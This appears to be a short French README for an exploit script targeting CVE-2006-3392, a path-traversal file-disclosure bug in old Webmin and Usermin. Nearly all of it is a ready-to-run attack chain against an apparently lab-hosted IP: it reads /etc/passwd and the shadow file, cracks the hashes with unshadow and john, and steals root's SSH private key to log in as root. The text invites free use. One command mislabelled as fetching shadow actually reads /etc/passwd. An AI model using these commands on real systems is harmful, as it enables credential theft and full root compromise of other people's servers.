
Webmin < 1.290 / Usermin < 1.220 - Divulgation arbitraire de fichiers
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin avant 1.290 et Usermin avant 1.220 appellent la fonction simplify_path avant de décoder le HTML, ce qui permet à des attaquants distants de lire des fichiers arbitraires, comme démontré avec les séquences "..%01", qui contournent la suppression des séquences "../" avant que des octets tels que "%01" ne soient supprimés du nom de fichier. NOTE : Ce problème est différent de CVE-2006-3274.
Parcourir n'importe quel fichier du système de fichiers avec privilège root
./exploit.sh <target ip> <target port> <file to disclose>
Parcourir passwd et shadow sur 10.10.11.105, exécuter unshadow et craquer les hashs
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Parcourir la clé rsa privée sur 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
N'hésitez pas à utiliser ou modifier quand et où vous voulez